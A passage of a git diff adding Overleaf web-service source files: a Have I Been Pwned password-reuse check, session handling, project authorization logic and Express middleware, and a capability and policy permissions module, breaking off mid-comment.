Docs: https://haveibeenpwned.com/API/v3#PwnedPasswordsPadding + 'Add-Padding': true, + }, + signal: AbortSignal.timeout(Settings.apis.haveIBeenPwned.timeout), + } + ) + } catch (_errorWithPotentialReferenceToPrefix) { + // NOTE: Do not leak request details by passing the original error up. + throw API_ERROR + } +} + +async function isPasswordReused(password) { + const sha1 = crypto + .createHash('sha1') + .update(password) + .digest('hex') + .toUpperCase() + const prefix = sha1.slice(0, 5) + const body = await getScoresForPrefix(prefix) + + let score = 0 + try { + for (const line of body.split('\r\n')) { + const [candidate, scoreRaw] = line.split(':') + if (prefix + candidate === sha1) { + score = parseInt(scoreRaw) + break + } + } + } catch (_errorWithPotentialReferenceToHash) { + // NOTE: Do not leak password details by logging the original error. + throw INVALID_RESPONSE + } + + if (Number.isNaN(score)) { + // NOTE: Do not leak password details by logging the score. + throw INVALID_SCORE + } + return score > 0 +} + +async function checkPasswordForReuse(password) { + if (!Settings.apis.haveIBeenPwned.enabled) { + return + } + + try { + const isReused = await isPasswordReused(password) + + Metrics.inc('password_re_use', { + status: isReused ? 're-used' : 'unique', + }) + + return isReused + } catch (err) { + let error = err + // Make sure we do not leak any password details. 
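+    // Known coded errors are re-created from their message alone, and any
+    // other error is replaced wholesale, so no attached properties or stack
+    // context can carry hash material out of this function.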
+ if (!CODED_ERROR_MESSAGES.includes(err.message)) { + error = new Error('hidden message') + } + error = new Error(error.message) + + Metrics.inc('password_re_use', { status: 'failure' }) + + throw error + } +} + +function checkPasswordForReuseInBackground(password) { + checkPasswordForReuse(password).catch(error => { + logger.err({ error }, 'cannot check password for re-use') + }) +} + +module.exports = { + checkPasswordForReuse: callbackify(checkPasswordForReuse), + checkPasswordForReuseInBackground, + promises: { + checkPasswordForReuse, + }, +} diff --git a/services/web/app/src/Features/Authentication/SessionManager.js b/services/web/app/src/Features/Authentication/SessionManager.js new file mode 100644 index 0000000..a64ee98 --- /dev/null +++ b/services/web/app/src/Features/Authentication/SessionManager.js @@ -0,0 +1,46 @@ +const _ = require('lodash') + +const SessionManager = { + getSessionUser(session) { + const sessionUser = _.get(session, ['user']) + const sessionPassportUser = _.get(session, ['passport', 'user']) + return sessionUser || sessionPassportUser || null + }, + + setInSessionUser(session, props) { + const sessionUser = SessionManager.getSessionUser(session) + if (!sessionUser) { + return + } + for (const key in props) { + const value = props[key] + sessionUser[key] = value + } + return null + }, + + isUserLoggedIn(session) { + const userId = SessionManager.getLoggedInUserId(session) + return ![null, undefined, false].includes(userId) + }, + + getLoggedInUserId(session) { + const user = SessionManager.getSessionUser(session) + if (user) { + return user._id + } else { + return null + } + }, + + getLoggedInUserV1Id(session) { + const user = SessionManager.getSessionUser(session) + if (user != null && user.v1_id != null) { + return user.v1_id + } else { + return null + } + }, +} + +module.exports = SessionManager diff --git a/services/web/app/src/Features/Authorization/AuthorizationManager.js b/services/web/app/src/Features/Authorization/AuthorizationManager.js new file mode 100644 index 0000000..2f339de --- /dev/null +++ b/services/web/app/src/Features/Authorization/AuthorizationManager.js @@ -0,0 +1,315 @@ +const { callbackify } = require('util') +const { ObjectId } = require('mongodb-legacy') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const { User } = require('../../models/User') +const PrivilegeLevels = require('./PrivilegeLevels') +const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') +const PublicAccessLevels = require('./PublicAccessLevels') +const Errors = require('../Errors/Errors') +const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') +const Settings = require('@overleaf/settings') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') + +function isRestrictedUser( + userId, + privilegeLevel, + isTokenMember, + isInvitedMember +) { + if (privilegeLevel === PrivilegeLevels.NONE) { + return true + } + return ( + privilegeLevel === PrivilegeLevels.READ_ONLY && + (isTokenMember || !userId) && + !isInvitedMember + ) +} + +async function isRestrictedUserForProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + const isTokenMember = await CollaboratorsHandler.promises.userIsTokenMember( + userId, + projectId + ) + const isInvitedMember = + await 
CollaboratorsGetter.promises.isUserInvitedMemberOfProject(
+      userId,
+      projectId
+    )
+  return isRestrictedUser(
+    userId,
+    privilegeLevel,
+    isTokenMember,
+    isInvitedMember
+  )
+}
+
+async function getPublicAccessLevel(projectId) {
+  if (!ObjectId.isValid(projectId)) {
+    throw new Error('invalid project id')
+  }
+
+  // Note, the Project property in the DB is `publicAccesLevel`, without the second `s`
+  const project = await ProjectGetter.promises.getProject(projectId, {
+    publicAccesLevel: 1,
+  })
+  if (!project) {
+    throw new Errors.NotFoundError(`no project found with id ${projectId}`)
+  }
+  return project.publicAccesLevel
+}
+
+/**
+ * Get the privilege level that the user has for the project.
+ *
+ * @param userId - The id of the user that wants to access the project.
+ * @param projectId - The id of the project to be accessed.
+ * @param {string} token
+ * @param {Object} opts
+ * @param {boolean} opts.ignoreSiteAdmin - Do not consider whether the user is
+ * a site admin.
+ * @param {boolean} opts.ignorePublicAccess - Do not consider whether the
+ * project is publicly accessible.
+ *
+ * @returns {string|boolean} The privilege level. One of "owner",
+ * "readAndWrite", "readOnly" or false.
+ */
+async function getPrivilegeLevelForProject(
+  userId,
+  projectId,
+  token,
+  opts = {}
+) {
+  if (userId) {
+    return getPrivilegeLevelForProjectWithUser(userId, projectId, opts)
+  } else {
+    return getPrivilegeLevelForProjectWithoutUser(projectId, token, opts)
+  }
+}
+
+// User is present, get their privilege level from database
+async function getPrivilegeLevelForProjectWithUser(
+  userId,
+  projectId,
+  opts = {}
+) {
+  if (!opts.ignoreSiteAdmin) {
+    if (await isUserSiteAdmin(userId)) {
+      return PrivilegeLevels.OWNER
+    }
+  }
+
+  const privilegeLevel =
+    await CollaboratorsGetter.promises.getMemberIdPrivilegeLevel(
+      userId,
+      projectId
+    )
+  if (privilegeLevel && privilegeLevel !== PrivilegeLevels.NONE) {
+    // The user has direct access
+    return privilegeLevel
+  }
+
+  if (!opts.ignorePublicAccess) {
+    // Legacy public-access system
+    // User is present (not anonymous), but does not have direct access
+    const publicAccessLevel = await getPublicAccessLevel(projectId)
+    if (publicAccessLevel === PublicAccessLevels.READ_ONLY) {
+      return PrivilegeLevels.READ_ONLY
+    }
+    if (publicAccessLevel === PublicAccessLevels.READ_AND_WRITE) {
+      return PrivilegeLevels.READ_AND_WRITE
+    }
+  }
+
+  return PrivilegeLevels.NONE
+}
+
+// User is anonymous; try token-based access
+async function getPrivilegeLevelForProjectWithoutUser(
+  projectId,
+  token,
+  opts = {}
+) {
+  const publicAccessLevel = await getPublicAccessLevel(projectId)
+  if (!opts.ignorePublicAccess) {
+    if (publicAccessLevel === PublicAccessLevels.READ_ONLY) {
+      // Legacy public read-only access for anonymous user
+      return PrivilegeLevels.READ_ONLY
+    }
+    if (publicAccessLevel === PublicAccessLevels.READ_AND_WRITE) {
+      // Legacy public read-write access for anonymous user
+      return PrivilegeLevels.READ_AND_WRITE
+    }
+  }
+  if (publicAccessLevel === PublicAccessLevels.TOKEN_BASED) {
+    return getPrivilegeLevelForProjectWithToken(projectId, token)
+  }
+
+  // Deny anonymous user access
+  return PrivilegeLevels.NONE
+}
+
+async function getPrivilegeLevelForProjectWithToken(projectId, token) {
+  // Anonymous users can have read-only access to token-based projects,
+  // while read-write access requires the user to be logged in,
+  // unless the `enableAnonymousReadAndWriteSharing` setting is enabled
+  const { isValidReadAndWrite, isValidReadOnly } =
+    await
TokenAccessHandler.promises.validateTokenForAnonymousAccess( + projectId, + token + ) + if (isValidReadOnly) { + // Grant anonymous user read-only access + return PrivilegeLevels.READ_ONLY + } + if (isValidReadAndWrite) { + // Grant anonymous user read-and-write access + return PrivilegeLevels.READ_AND_WRITE + } + // Deny anonymous access + return PrivilegeLevels.NONE +} + +async function canUserReadProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return [ + PrivilegeLevels.OWNER, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.REVIEW, + ].includes(privilegeLevel) +} + +async function canUserWriteProjectContent(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return [PrivilegeLevels.OWNER, PrivilegeLevels.READ_AND_WRITE].includes( + privilegeLevel + ) +} + +async function canUserWriteOrReviewProjectContent(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return ( + privilegeLevel === PrivilegeLevels.OWNER || + privilegeLevel === PrivilegeLevels.READ_AND_WRITE || + privilegeLevel === PrivilegeLevels.REVIEW + ) +} + +async function canUserWriteProjectSettings(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token, + { ignorePublicAccess: true } + ) + return [PrivilegeLevels.OWNER, PrivilegeLevels.READ_AND_WRITE].includes( + privilegeLevel + ) +} + +async function canUserRenameProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return privilegeLevel === PrivilegeLevels.OWNER +} + +async function canUserAdminProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return privilegeLevel === PrivilegeLevels.OWNER +} + +async function isUserSiteAdmin(userId) { + if (!userId) { + return false + } + if (!Settings.adminPrivilegeAvailable) return false + const user = await User.findOne({ _id: userId }, { isAdmin: 1 }).exec() + return hasAdminAccess(user) +} + +async function canUserDeleteOrResolveThread( + userId, + projectId, + docId, + threadId, + token +) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token, + { ignorePublicAccess: true } + ) + if ( + privilegeLevel === PrivilegeLevels.OWNER || + privilegeLevel === PrivilegeLevels.READ_AND_WRITE + ) { + return true + } + + if (privilegeLevel !== PrivilegeLevels.REVIEW) { + return false + } + + const comment = await DocumentUpdaterHandler.promises.getComment( + projectId, + docId, + threadId + ) + return comment.metadata.user_id === userId +} + +module.exports = { + canUserReadProject: callbackify(canUserReadProject), + canUserWriteProjectContent: callbackify(canUserWriteProjectContent), + canUserWriteOrReviewProjectContent: callbackify( + canUserWriteOrReviewProjectContent + ), + canUserDeleteOrResolveThread: callbackify(canUserDeleteOrResolveThread), + canUserWriteProjectSettings: callbackify(canUserWriteProjectSettings), + canUserRenameProject: callbackify(canUserRenameProject), + canUserAdminProject: callbackify(canUserAdminProject), + getPrivilegeLevelForProject: callbackify(getPrivilegeLevelForProject), + isRestrictedUser, + isRestrictedUserForProject: callbackify(isRestrictedUserForProject), + isUserSiteAdmin: 
callbackify(isUserSiteAdmin), + promises: { + canUserReadProject, + canUserWriteProjectContent, + canUserWriteOrReviewProjectContent, + canUserDeleteOrResolveThread, + canUserWriteProjectSettings, + canUserRenameProject, + canUserAdminProject, + getPrivilegeLevelForProject, + isRestrictedUserForProject, + isUserSiteAdmin, + }, +} diff --git a/services/web/app/src/Features/Authorization/AuthorizationMiddleware.js b/services/web/app/src/Features/Authorization/AuthorizationMiddleware.js new file mode 100644 index 0000000..0204344 --- /dev/null +++ b/services/web/app/src/Features/Authorization/AuthorizationMiddleware.js @@ -0,0 +1,292 @@ +const AuthorizationManager = require('./AuthorizationManager') +const logger = require('@overleaf/logger') +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../Errors/Errors') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const AuthenticationController = require('../Authentication/AuthenticationController') +const SessionManager = require('../Authentication/SessionManager') +const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') +const { expressify } = require('@overleaf/promise-utils') +const { + canRedirectToAdminDomain, +} = require('../Helpers/AdminAuthorizationHelper') +const { getSafeAdminDomainRedirect } = require('../Helpers/UrlHelper') + +function _handleAdminDomainRedirect(req, res) { + if (canRedirectToAdminDomain(SessionManager.getSessionUser(req.session))) { + logger.warn({ req }, 'redirecting admin user to admin domain') + res.redirect(getSafeAdminDomainRedirect(req.originalUrl)) + return true + } + return false +} + +async function ensureUserCanReadMultipleProjects(req, res, next) { + const projectIds = (req.query.project_ids || '').split(',') + const userId = _getUserId(req) + for (const projectId of projectIds) { + const token = TokenAccessHandler.getRequestToken(req, projectId) + const canRead = await AuthorizationManager.promises.canUserReadProject( + userId, + projectId, + token + ) + if (!canRead) { + return _redirectToRestricted(req, res, next) + } + } + next() +} + +async function blockRestrictedUserFromProject(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + const isRestrictedUser = + await AuthorizationManager.promises.isRestrictedUserForProject( + userId, + projectId, + token + ) + if (isRestrictedUser) { + return HttpErrorHandler.forbidden(req, res) + } + next() +} + +async function ensureUserCanReadProject(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + const canRead = await AuthorizationManager.promises.canUserReadProject( + userId, + projectId, + token + ) + if (canRead) { + logger.debug({ userId, projectId }, 'allowing user read access to project') + return next() + } + logger.debug({ userId, projectId }, 'denying user read access to project') + HttpErrorHandler.forbidden(req, res) +} + +async function ensureUserCanWriteProjectSettings(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + + if (req.body.name != null) { + const canRename = await AuthorizationManager.promises.canUserRenameProject( + userId, + projectId, + token + ) + if (!canRename) { + return HttpErrorHandler.forbidden(req, res) + } + } + + const otherParams = 
Object.keys(req.body).filter(x => x !== 'name')
+  if (otherParams.length > 0) {
+    const canWrite =
+      await AuthorizationManager.promises.canUserWriteProjectSettings(
+        userId,
+        projectId,
+        token
+      )
+    if (!canWrite) {
+      return HttpErrorHandler.forbidden(req, res)
+    }
+  }
+
+  next()
+}
+
+async function ensureUserCanDeleteOrResolveThread(req, res, next) {
+  const projectId = _getProjectId(req)
+  const docId = _getDocId(req)
+  const threadId = _getThreadId(req)
+  const userId = _getUserId(req)
+  const token = TokenAccessHandler.getRequestToken(req, projectId)
+  const canDeleteThread =
+    await AuthorizationManager.promises.canUserDeleteOrResolveThread(
+      userId,
+      projectId,
+      docId,
+      threadId,
+      token
+    )
+  if (canDeleteThread) {
+    logger.debug(
+      { userId, projectId },
+      'allowing user to delete or resolve a comment thread'
+    )
+    return next()
+  }
+
+  logger.debug(
+    { userId, projectId, threadId },
+    'denying user permission to delete or resolve a comment thread'
+  )
+  return HttpErrorHandler.forbidden(req, res)
+}
+
+async function ensureUserCanWriteProjectContent(req, res, next) {
+  const projectId = _getProjectId(req)
+  const userId = _getUserId(req)
+  const token = TokenAccessHandler.getRequestToken(req, projectId)
+  const canWrite =
+    await AuthorizationManager.promises.canUserWriteProjectContent(
+      userId,
+      projectId,
+      token
+    )
+  if (canWrite) {
+    logger.debug(
+      { userId, projectId },
+      'allowing user write access to project content'
+    )
+    return next()
+  }
+  logger.debug(
+    { userId, projectId },
+    'denying user write access to project content'
+  )
+  HttpErrorHandler.forbidden(req, res)
+}
+
+async function ensureUserCanWriteOrReviewProjectContent(req, res, next) {
+  const projectId = _getProjectId(req)
+  const userId = _getUserId(req)
+  const token = TokenAccessHandler.getRequestToken(req, projectId)
+
+  const canWriteOrReviewProjectContent =
+    await AuthorizationManager.promises.canUserWriteOrReviewProjectContent(
+      userId,
+      projectId,
+      token
+    )
+  if (canWriteOrReviewProjectContent) {
+    logger.debug(
+      { userId, projectId },
+      'allowing user write or review access to project content'
+    )
+    return next()
+  }
+
+  logger.debug(
+    { userId, projectId },
+    'denying user write or review access to project content'
+  )
+  return HttpErrorHandler.forbidden(req, res)
+}
+
+async function ensureUserCanAdminProject(req, res, next) {
+  const projectId = _getProjectId(req)
+  const userId = _getUserId(req)
+  const token = TokenAccessHandler.getRequestToken(req, projectId)
+  const canAdmin = await AuthorizationManager.promises.canUserAdminProject(
+    userId,
+    projectId,
+    token
+  )
+  if (canAdmin) {
+    logger.debug({ userId, projectId }, 'allowing user admin access to project')
+    return next()
+  }
+  logger.debug({ userId, projectId }, 'denying user admin access to project')
+  HttpErrorHandler.forbidden(req, res)
+}
+
+async function ensureUserIsSiteAdmin(req, res, next) {
+  const userId = _getUserId(req)
+  if (await AuthorizationManager.promises.isUserSiteAdmin(userId)) {
+    logger.debug({ userId }, 'allowing user admin access to site')
+    return next()
+  }
+  if (_handleAdminDomainRedirect(req, res)) return
+  logger.debug({ userId }, 'denying user admin access to site')
+  _redirectToRestricted(req, res, next)
+}
+
+function _getProjectId(req) {
+  const projectId = req.params.project_id || req.params.Project_id
+  if (!projectId) {
+    throw new Error('Expected project_id in request parameters')
+  }
+  if (!ObjectId.isValid(projectId)) {
+    throw new Errors.NotFoundError(`invalid projectId: ${projectId}`)
+ } + return projectId +} + +function _getDocId(req) { + const docId = req.params.doc_id + if (!docId) { + throw new Error('Expected doc_id in request parameters') + } + if (!ObjectId.isValid(docId)) { + throw new Errors.NotFoundError(`invalid docId: ${docId}`) + } + return docId +} + +function _getThreadId(req) { + const threadId = req.params.thread_id + if (!threadId) { + throw new Error('Expected thread_id in request parameters') + } + if (!ObjectId.isValid(threadId)) { + throw new Errors.NotFoundError(`invalid threadId: ${threadId}`) + } + return threadId +} + +function _getUserId(req) { + return ( + SessionManager.getLoggedInUserId(req.session) || + (req.oauth_user && req.oauth_user._id) || + null + ) +} + +function _redirectToRestricted(req, res, next) { + // TODO: move this to throwing ForbiddenError + res.redirect(`/restricted?from=${encodeURIComponent(res.locals.currentUrl)}`) +} + +function restricted(req, res, next) { + if (SessionManager.isUserLoggedIn(req.session)) { + return res.render('user/restricted', { title: 'restricted' }) + } + const { from } = req.query + logger.debug({ from }, 'redirecting to login') + if (from) { + AuthenticationController.setRedirectInSession(req, from) + } + res.redirect('/login') +} + +module.exports = { + ensureUserCanReadMultipleProjects: expressify( + ensureUserCanReadMultipleProjects + ), + blockRestrictedUserFromProject: expressify(blockRestrictedUserFromProject), + ensureUserCanReadProject: expressify(ensureUserCanReadProject), + ensureUserCanWriteProjectSettings: expressify( + ensureUserCanWriteProjectSettings + ), + ensureUserCanDeleteOrResolveThread: expressify( + ensureUserCanDeleteOrResolveThread + ), + ensureUserCanWriteProjectContent: expressify( + ensureUserCanWriteProjectContent + ), + ensureUserCanWriteOrReviewProjectContent: expressify( + ensureUserCanWriteOrReviewProjectContent + ), + ensureUserCanAdminProject: expressify(ensureUserCanAdminProject), + ensureUserIsSiteAdmin: expressify(ensureUserIsSiteAdmin), + restricted, +} diff --git a/services/web/app/src/Features/Authorization/PermissionsController.js b/services/web/app/src/Features/Authorization/PermissionsController.js new file mode 100644 index 0000000..c9ffac3 --- /dev/null +++ b/services/web/app/src/Features/Authorization/PermissionsController.js @@ -0,0 +1,103 @@ +const { ForbiddenError, UserNotFoundError } = require('../Errors/Errors') +const { + getUserCapabilities, + getUserRestrictions, + combineGroupPolicies, + combineAllowedProperties, +} = require('./PermissionsManager') +const { assertUserPermissions } = require('./PermissionsManager').promises +const Modules = require('../../infrastructure/Modules') +const { expressify } = require('@overleaf/promise-utils') +const Features = require('../../infrastructure/Features') + +/** + * Function that returns middleware to add an `assertPermission` function to the request object to check if the user has a specific capability. + * @returns {Function} The middleware function that adds the `assertPermission` function to the request object. 
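+ *
+ * Illustrative usage (wiring hypothetical):
+ *   app.use(useCapabilities())
+ *   // later, in a request handler:
+ *   req.assertPermission('delete-own-account') // throws ForbiddenError if a policy removed it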
+ */ +function useCapabilities() { + const middleware = async function (req, res, next) { + // attach the user's capabilities to the request object + req.capabilitySet = new Set() + // provide a function to assert that a capability is present + req.assertPermission = capability => { + if (!req.capabilitySet.has(capability)) { + throw new ForbiddenError( + `user does not have permission for ${capability}` + ) + } + } + if (!req.user) { + return next() + } + try { + let results = await Modules.promises.hooks.fire( + 'getGroupPolicyForUser', + req.user + ) + // merge array of all results from all modules + results = results.flat() + + if (results.length > 0) { + // get the combined group policy applying to the user + const groupPolicies = results.map(result => result.groupPolicy) + const combinedGroupPolicy = combineGroupPolicies(groupPolicies) + // attach the new capabilities to the request object + for (const cap of getUserCapabilities(combinedGroupPolicy)) { + req.capabilitySet.add(cap) + } + // also attach the user's restrictions (the capabilities they don't have) + req.userRestrictions = getUserRestrictions(combinedGroupPolicy) + + // attach allowed properties to the request object + const allowedProperties = combineAllowedProperties(results) + for (const [prop, value] of Object.entries(allowedProperties)) { + req[prop] = value + } + } + next() + } catch (error) { + if (error instanceof UserNotFoundError) { + // the user is logged in but doesn't exist in the database + // this can happen if the user has just deleted their account + return next() + } else { + next(error) + } + } + } + return expressify(middleware) +} + +/** + * Function that returns middleware to check if the user has permission to access a resource. + * @param {[string]} requiredCapabilities - the capabilities required to access the resource. + * @returns {Function} The middleware function that checks if the user has the required capabilities. + */ +function requirePermission(...requiredCapabilities) { + if ( + requiredCapabilities.length === 0 || + requiredCapabilities.some(capability => typeof capability !== 'string') + ) { + throw new Error('invalid required capabilities') + } + const doRequest = async function (req, res, next) { + if (!Features.hasFeature('saas')) { + return next() + } + if (!req.user) { + return next(new Error('no user')) + } + try { + await assertUserPermissions(req.user, requiredCapabilities) + next() + } catch (error) { + next(error) + } + } + return doRequest +} + +module.exports = { + requirePermission, + useCapabilities, +} diff --git a/services/web/app/src/Features/Authorization/PermissionsManager.js b/services/web/app/src/Features/Authorization/PermissionsManager.js new file mode 100644 index 0000000..a20280a --- /dev/null +++ b/services/web/app/src/Features/Authorization/PermissionsManager.js @@ -0,0 +1,480 @@ +/** + * This module exports functions for managing permissions and policies. + * + * It provides a way to: + * + * - Register capabilities and policies + * - Associate policies with custom validators + * - Apply collections of policies to a user + * - Check whether a user has a given capability + * - Check whether a user complies with a given policy + * + * Capabilities: boolean values that represent whether a user is allowed to + * perform a certain action or not. The capabilities are represented as a Set. + * For example, to delete their account a user would need the + * `delete-own-account` capability. 
A user starts with a set of default
+ * capabilities that let them do all the things they can currently do in
+ * Overleaf.
+ *
+ * Policy: a rule which specifies which capabilities will be removed from a user
+ * when the policy is applied.
+ *
+ * For example, a policy `userCannotDeleteOwnAccount` is represented as
+ * `{'delete-own-account' : false}` meaning that the `delete-own-account`
+ * capability will be removed. A policy can remove more than one capability, and
+ * more than one policy could apply to a user.
+ *
+ * Validator: a function that takes an object with user and subscription properties
+ * and returns a boolean indicating whether the user satisfies the policy or not.
+ * For example, a validator for the `userCannotHaveSecondaryEmail` policy would
+ * check whether the user has more than one email address.
+ *
+ * Group Policies: a collection of policies with a setting indicating whether
+ * they are enforced or not. Used to place restrictions on managed users in a
+ * group.
+ *
+ * For example, a group policy could be
+ *
+ * {
+ *   "userCannotDeleteOwnAccount": true, // enforced
+ *   "userCannotHaveSecondaryEmail": false // not enforced
+ * }
+ */
+
+const { callbackify } = require('util')
+const { ForbiddenError } = require('../Errors/Errors')
+const Modules = require('../../infrastructure/Modules')
+
+const POLICY_TO_CAPABILITY_MAP = new Map()
+const POLICY_TO_VALIDATOR_MAP = new Map()
+const DEFAULT_PERMISSIONS = new Map()
+const ALLOWED_PROPERTIES = new Set()
+
+/**
+ * Throws an error if the given capability is not registered.
+ *
+ * @private
+ * @param {string} capability - The name of the capability to check.
+ * @throws {Error} If the capability is not registered.
+ */
+function ensureCapabilityExists(capability) {
+  if (!DEFAULT_PERMISSIONS.has(capability)) {
+    throw new Error(`unknown capability: ${capability}`)
+  }
+}
+
+/**
+ * Validates a group policy object
+ *
+ * @param {Object} policies - An object containing policy names and booleans
+ * as key-value entries.
+ * @throws {Error} if the `policies` object contains a policy that is not
+ * registered, or the policy value is not a boolean
+ */
+function validatePolicies(policies) {
+  for (const [policy, value] of Object.entries(policies)) {
+    if (!POLICY_TO_CAPABILITY_MAP.has(policy)) {
+      throw new Error(`unknown policy: ${policy}`)
+    }
+    if (typeof value !== 'boolean') {
+      throw new Error(`policy value must be a boolean: ${policy} = ${value}`)
+    }
+  }
+}
+
+/**
+ * Registers a new capability with the given name and options.
+ *
+ * @param {string} name - The name of the capability to register.
+ * @param {Object} options - The options for the capability.
+ * @param {boolean} options.default - The default value for the capability
+ * (required).
+ * @throws {Error} If the default value is not a boolean or if the capability is
+ * already registered.
+ */
+function registerCapability(name, options) {
+  // check that the default value is a boolean
+  const defaultValue = options?.default
+  if (typeof defaultValue !== 'boolean') {
+    throw new Error('default value must be a boolean')
+  }
+  if (DEFAULT_PERMISSIONS.has(name)) {
+    throw new Error(`capability already registered: ${name}`)
+  }
+  DEFAULT_PERMISSIONS.set(name, defaultValue)
+}
+
+/**
+ * Registers a new policy with the given name, capabilities, and options.
+ *
+ * @param {string} name - The name of the policy to register.
+ * @param {Object} capabilities - The capabilities for the policy.
+ * @param {Object} [options] - The options for the policy.
+ * @param {Function?} [options.validator] - The optional validator function for the + * policy. + * @throws {Error} If the policy is already registered or if a capability is not + * a boolean or is unknown. + */ +function registerPolicy(name, capabilities, options = {}) { + const { validator } = options + // check that the only options provided are capabilities and validators + // FIXME: maybe use a schema validator here? + if (POLICY_TO_CAPABILITY_MAP.has(name)) { + throw new Error(`policy already registered: ${name}`) + } + // check that all the entries in the capability set exist and are booleans + for (const [capabilityName, capabilityValue] of Object.entries( + capabilities + )) { + // check that the capability exists (look in the default permissions) + if (!DEFAULT_PERMISSIONS.has(capabilityName)) { + throw new Error(`unknown capability: ${capabilityName}`) + } + // check that the value is a boolean + if (typeof capabilityValue !== 'boolean') { + throw new Error( + `capability value must be a boolean: ${capabilityName} = ${capabilityValue}` + ) + } + } + // set the policy capabilities + POLICY_TO_CAPABILITY_MAP.set(name, new Map(Object.entries(capabilities))) + + // set the policy validator (if present) + if (validator) { + POLICY_TO_VALIDATOR_MAP.set(name, validator) + } +} + +/** + * Registers an allowed property that can be added to the request object. + * + * @param {string} name - The name of the property to register. + * @returns {void} + */ +function registerAllowedProperty(name) { + ALLOWED_PROPERTIES.add(name) +} + +/** + * returns the set of allowed properties that have been registered + * + * @returns {Set} ALLOWED_PROPERTIES + */ +function getAllowedProperties() { + return ALLOWED_PROPERTIES +} +/** + * Returns an array of policy names that are enforced based on the provided + * group policy object. + * + * @private + * @param {Object} groupPolicy - The group policy object to check. + * @returns {Array} An array of policy names that are enforced. + */ +function getEnforcedPolicyNames(groupPolicy = {}) { + if (!groupPolicy) { + return [] + } + return Object.keys( + typeof groupPolicy.toObject === 'function' + ? groupPolicy.toObject() + : groupPolicy + ).filter( + policyName => + !['__v', '_id'].includes(policyName) && groupPolicy[policyName] !== false + ) // filter out the policies that are not enforced +} + +/** + * Returns the value of the specified capability for the given policy. + * + * @private + * @param {string} policyName - The name of the policy to retrieve the + * capability value from. + * @param {string} capability - The name of the capability to retrieve the value + * for. + * @returns {boolean | undefined} The value of the capability for the policy, or + * undefined if the policy or capability is not found. + */ +function getCapabilityValueFromPolicy(policyName, capability) { + return POLICY_TO_CAPABILITY_MAP.get(policyName)?.get(capability) +} + +/** + * Returns the default value for the specified capability. + * + * @private + * @param {string} capability - The name of the capability to retrieve the + * default value for. + * @returns {boolean | undefined} The default value for the capability, or + * undefined if the capability is not found. + */ +function getDefaultPermission(capability) { + return DEFAULT_PERMISSIONS.get(capability) +} + +function getValidatorFromPolicy(policyName) { + return POLICY_TO_VALIDATOR_MAP.get(policyName) +} + +/** + * Returns a set of default capabilities based on the DEFAULT_PERMISSIONS map. 
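+ * Only capabilities whose registered default value is `true` are included.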
+ * + * @private + * @returns {Set} A set of default capabilities. + */ +function getDefaultCapabilities() { + const defaultCapabilities = new Set() + for (const [ + capabilityName, + capabilityValue, + ] of DEFAULT_PERMISSIONS.entries()) { + if (capabilityValue === true) { + defaultCapabilities.add(capabilityName) + } + } + return defaultCapabilities +} + +/** + * Applies a given policy to a set of capabilities, to remove those capabilities + * which are not allowed by the policy. + * + * @private + * @param {Set} capabilitySet - The set of capabilities to apply the policy to. + * @param {string} policyName - The name of the policy to apply. + * @throws {Error} If the policy is unknown. + */ +function applyPolicy(capabilitySet, policyName) { + const policyCapabilities = POLICY_TO_CAPABILITY_MAP.get(policyName) + if (!policyCapabilities) { + throw new Error(`unknown policy: ${policyName}`) + } + for (const [ + capabilityName, + capabilityValue, + ] of policyCapabilities.entries()) { + if (capabilityValue !== true) { + capabilitySet.delete(capabilityName) + } + } +} + +/** + * Returns a set of capabilities that a user has based on their group policy. + * + * @param {Object} groupPolicy - The group policy object to check. + * @returns {Set} A set of capabilities that the user has, based on their group + * policy. + * @throws {Error} If the policy is unknown. + */ +function getUserCapabilities(groupPolicy) { + const userCapabilities = getDefaultCapabilities() + const enforcedPolicyNames = getEnforcedPolicyNames(groupPolicy) + for (const enforcedPolicyName of enforcedPolicyNames) { + applyPolicy(userCapabilities, enforcedPolicyName) + } + return userCapabilities +} + +/** + * Combines an array of group policies into a single policy object. + * + * @param {Array} groupPolicies - An array of group policies. + * @returns {Object} - The combined group policy object. + */ +function combineGroupPolicies(groupPolicies) { + const combinedGroupPolicy = {} + for (const groupPolicy of groupPolicies) { + const enforcedPolicyNames = getEnforcedPolicyNames(groupPolicy) + for (const enforcedPolicyName of enforcedPolicyNames) { + combinedGroupPolicy[enforcedPolicyName] = true + } + } + return combinedGroupPolicy +} + +/** + * Combines the allowed properties from an array of property objects. + * + * @param {Array<Object>} propertyObjects - An array of property objects. + * @returns {Object} - An object containing the combined allowed properties. + */ +function combineAllowedProperties(propertyObjects) { + const userProperties = {} + for (const properties of propertyObjects) { + for (const [key, value] of Object.entries(properties)) { + if (ALLOWED_PROPERTIES.has(key)) { + userProperties[key] ??= value + } + } + } + return userProperties +} + +/** + * Returns a set of capabilities that a user does not have based on their group policy. + * + * @param {Object} groupPolicy - The group policy object to check. + * @returns {Set} A set of capabilities that the user does not have, based on their group + * policy. + 